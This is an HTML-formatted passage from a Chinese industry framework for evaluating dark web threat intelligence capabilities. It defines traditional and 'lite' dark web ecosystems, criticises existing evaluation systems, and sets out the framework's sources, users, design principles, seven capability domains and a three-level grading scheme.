leaf="">的全链路技术能力框架，具有重要的现实意义与行业价值。本框架通过统一评估标准、明确能力等级、量化关键指标，可为安全厂商、政企单位、监管机构提供可参照、可核验、可落地的技术标尺，助力提升暗网威胁发现、预警、溯源与处置能力，完善数据泄露与勒索软件攻击的事前监测、事中响应、事后闭环体系，推动国内暗网威胁情报领域向标准化、专业化、实战化方向发展。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">1.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">国内暗网威胁生态现状</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为清晰界定框架覆盖范围，先对两类核心暗网形态进行定义：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">1.</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web（传统暗网）</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指基于 Tor、I2P 等匿名网络搭建，需专用浏览器与特殊网络配置才可访问的封闭网络空间。典型形态包括黑客论坛、勒索软件数据泄露站点、数据交易市场、IAB交易平台、RaaS 服务站点等，具有强匿名、高隐蔽、长期存续、结构固定等特征。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42.25pt;text-indent: -21.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">2.</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite（轻暗网）</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指基于加密通讯软件、封闭社群、私密频道 / 群组形成的次生地下生态。无需传统匿名网络即可访问，但具备封闭、加密、邀请制、隐蔽交易等特征，是当前数据泄露贩卖、勒索通知、入侵工具流通、侵公查档、黑灰产协作的主要载体，具有传播快、波动大、迭代快、规模庞大等特点。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">当前，国内网络犯罪与地下黑灰产已形成 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web 与 Dark Web Lite 并行、相互协同、全域覆盖</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 的复杂威胁生态。Traditional Dark Web 作为核心攻击组织与数据贩卖的策源地，持续输出威胁能力与交易规则；Dark Web Lite 则承担大规模数据流通、实时交易、攻击协作与扩散分发功能，二者共同构成规模化、产业化、链条化的地下产业体系。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">受反爬策略、地址轮换、平台封禁、执法行动、加密机制等影响，两类威胁源均呈现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高波动、高对抗、高隐蔽</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">特性，传统监测与情报手段难以实现稳定采集、及时分析与有效闭环，对政企机构安全防御与行业监管治理构成显著挑战。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">1.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">现有评估体系存在的问题</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">当前国际暗网情报技术领域正处于快速发展阶段，我国尚处于萌芽阶段，行业标准、技术边界、能力定义、评估体系均未统一，在实践中存在诸多突出问题：</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">一是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报技术领域界定模糊，易与传统威胁情报混淆</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。行业常将暗网情报（DWI/DWTI）与网络威胁情报（CTI）、漏洞情报、高级持续性威胁（APT）情报、开源情报（OSINT）、互联网舆情等概念混用，未能清晰区分其监测对象、覆盖范围、技术路径与应用场景，导致能力建设方向不明确。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">二是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报的领域独立性未被充分认知</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。暗网情报虽常被交叉纳入数字风险保护（DPRS）、外部攻击面管理（EASM）、扩展威胁情报（XTI）、网络空间测绘、黑灰产威胁等其他网络安全领域，但因其所面向环境的封闭性、高对抗性、生态化特征，且更聚焦于入侵既成事实后的及时发现、溯源与处置，具备显著的领域独立性，现有评估体系未能体现这一核心特点。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">三是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网研究方向不清晰，易出现范畴错位</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。全球范围内对暗网的研究已分化为多条技术路线：一类以暗网基础设施、节点与流量为研究对象；一类以执法打击毒品、人口贩卖等犯罪为目标；第三类则聚焦网络安全领域，研究非法数据交易、IAB 攻击情报、企业与国家机密泄露、ATO 威胁、RaaS 产业化等内容。当前行业评估未明确界定研究范畴，易造成对象错位、标准失焦。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">四是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">能力定义不统一，边界模糊</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。不同机构对 Traditional Dark Web 与 Dark Web Lite 两类生态的覆盖范围、监测重点、评价维度缺乏共识，能力描述主观化、碎片化，难以形成统一对标。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">五是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">缺乏量化指标，评估偏主观</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。现有评价多以 “覆盖广”“时效性强”“分析精准” 等定性描述为主，缺少可核验、可对比、可落地的量化标准，无法客观衡量采集规模、响应时延、数据质量、对抗能力、处置闭环效果。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">六是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">国内外标准脱节，本土化适配不足</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。国际通用评估体系未充分考虑中文暗网生态、IAB 交易、数据贩卖、侵公威胁等国内高发威胁形态，直接套用难以满足实战需求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">七是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">能力碎片化，未形成全链路视角</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。多数评估仅聚焦单一环节，缺少对 “采集 — 对抗 — 分析 — 存档 — 溯源 — 应急” 全流程的体系化设计，无法支撑政企机构构建完整的暗网威胁治理闭环。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">1.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">本框架编制依据与参考标准</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架在编制过程中，充分对标全球暗网情报领域成熟评估体系，结合国内网络安全监管要求与本土化暗网威胁特征，形成兼顾国际先进性、行业实用性与场景针对性的技术能力标尺，主要编制依据如下：</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">一是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">国际权威行业研究与评估框架</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。框架参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard 2025》、Gartner《Market Guide for Threat Intelligence Products and Services 2024》、Forrester《The State of Threat Intelligence 2025》《External Threat Intelligence Service Providers Landscape 2025》等全球主流机构的研究方法论、能力维度与评估逻辑，借鉴国际先进的暗网情报能力划分、指标设计与实践经验，确保框架体系完整、维度科学。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">二是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">国内网络安全监管与实战需求</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。立足我国网络安全法律规范、数据安全管理要求及关键信息基础设施保护需求，聚焦中文暗网生态、IAB 交易、数据泄露贩卖、勒索软件、RaaS 产业化、侵公类威胁等本土高发场景，强化对 Traditional Dark Web 与 Dark Web Lite 双生态的覆盖，突出可落地、可量化、可核验的实战导向。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">三是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">国内暗网情报领域产业实践</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。综合国内主流安全厂商、政企安全运营单位、威胁情报服务机构的技术能力现状与建设痛点，围绕采集、对抗、分析、存档、溯源、应急等全流程环节，形成符合国内产业发展阶段、可普遍适用的能力分级与指标体系。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">四是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">领域专属技术特性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。严格遵循暗网情报的独立性、生态性、封闭性、高对抗性特征，聚焦 “入侵既成事实后的及时发现、溯源与处置” 核心定位，明确本框架仅面向网络</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全领域范畴</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的暗网情报能力，即针对非法数据交易、IAB 攻击情报、国家 / 企业机密泄露、ATO 威胁、RaaS 服务等相关威胁的监测、分析与处置能力，不包含暗网基础设施研究及非网络安全类执法研究方向，确保框架边界清晰、定位精准。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">1.5.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">框架适用对象与使用场景</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架聚焦</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">网络安全领域内的暗网威胁情报能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，面向全行业提供统一、可量化、可落地的技术评估标准，具备广泛的适用性与实践价值。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1.5.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">适用对象</span></span></h3><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.1pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全产品与服务厂商</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：用于暗网情报相关产品研发、能力迭代、服务标准化与对外能力展示。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.1pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">政企及关键信息基础设施运营单位</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：用于暗网情报能力自查、建设规划、安全运营评估与供应商选型对标。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.1pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">监管与研究机构</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：用于行业态势分析、技术标准制定、领域研究参考及产业规范化指导。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.1pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">测评与认证机构</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：用于暗网情报产品 / 服务的测试、检验、评估与定级依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1.5.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">主要使用场景</span></span></h3><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">能力自评与规划</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：机构可对照指标体系开展全面自检，明确短板，制定分阶段建设路线。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">供应商选型与验收</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：以量化指标为标尺，客观对比厂商能力，规范项目需求与验收标准。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">产品设计与研发</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：为暗网监测、采集、分析、存档、溯源、应急响应等系统开发提供能力蓝图。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">安全运营与实战处置</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：指导建立 “发现 — 分析 — 研判 — 溯源 — 闭环” 的暗网威胁应急处置流程。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">行业交流与对标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：为行业内能力对比、技术交流、实践分享提供统一口径与共识基础。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第二章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">总体设计</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本章明确框架的核心设计原则、整体能力结构、统一分级标准与评估边界，是全文的纲领性章节，用于规范后续所有能力维度的定义、划分与评价口径。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">2.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">设计原则</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架遵循</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">科学性、系统性、实战性、独立性、本土化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">五大核心设计原则，确保体系完整、逻辑严谨、可落地、可核验。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">科学性原则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：对标国际权威评估体系，采用可量化、可验证、可对比的指标设计，避免主观定性描述。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">系统性原则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：覆盖暗网情报全技术链条，形成 “采集 — 对抗 — 分析 — 存档 — 治理 — 响应” 的完整闭环。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实战性原则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：聚焦真实威胁场景，以数据泄露、IAB 交易、勒索软件、RaaS、侵公威胁等本土高发风险为核心导向。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">独立性原则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：明确暗网情报专属技术边界，突出其生态封闭性、高对抗性、事后发现与快速处置的领域特性。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">本土化原则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：深度适配中文暗网生态、Traditional Dark Web 与 Dark Web Lite 双域并行特征，贴合国内监管与运营需求。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">2.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">框架整体结构</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架围绕暗网情报全生命周期能力构建，共设</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">7 大核心能力域</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，全面覆盖技术实现、运营效能与服务闭环：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">1．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web 威胁源采集和反爬对抗能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">2．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源采集能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">3．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报智能分析能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">4．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报高保真复制和持久化存档能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">5．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中文暗网生态环境威胁识别能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">6．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量泄露数据知识库能力</span></strong></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 0pt;text-indent: 24pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">7．</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">事件处置与响应闭环能力</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">各能力域下设二级指标项，统一采用</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础、良好、优秀</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">三级评定标准，形成层次清晰、维度完整、可量化评估的技术能力体系。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">2.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">能力分级定义</span></span></span></h2><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架对所有指标统一划分为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">三级能力水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：具备核心功能与基本覆盖，满足最低可用要求，以人工或半自动化方式实现主要流程。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">先进级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：具备较高自动化水平与规模化处理能力，时效性、稳定性、完整性明显提升，可支撑常态化运营。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">优秀级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：具备全流程自动化、高对抗性、高保真、高时效与全域覆盖能力，达到行业领先与实战化标杆水平。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">2.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">评估范围与边界说明</span></span></span></h2><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">1．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">领域边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：本框架仅针对</span></span><span style="font-variant: normal;text-transform: 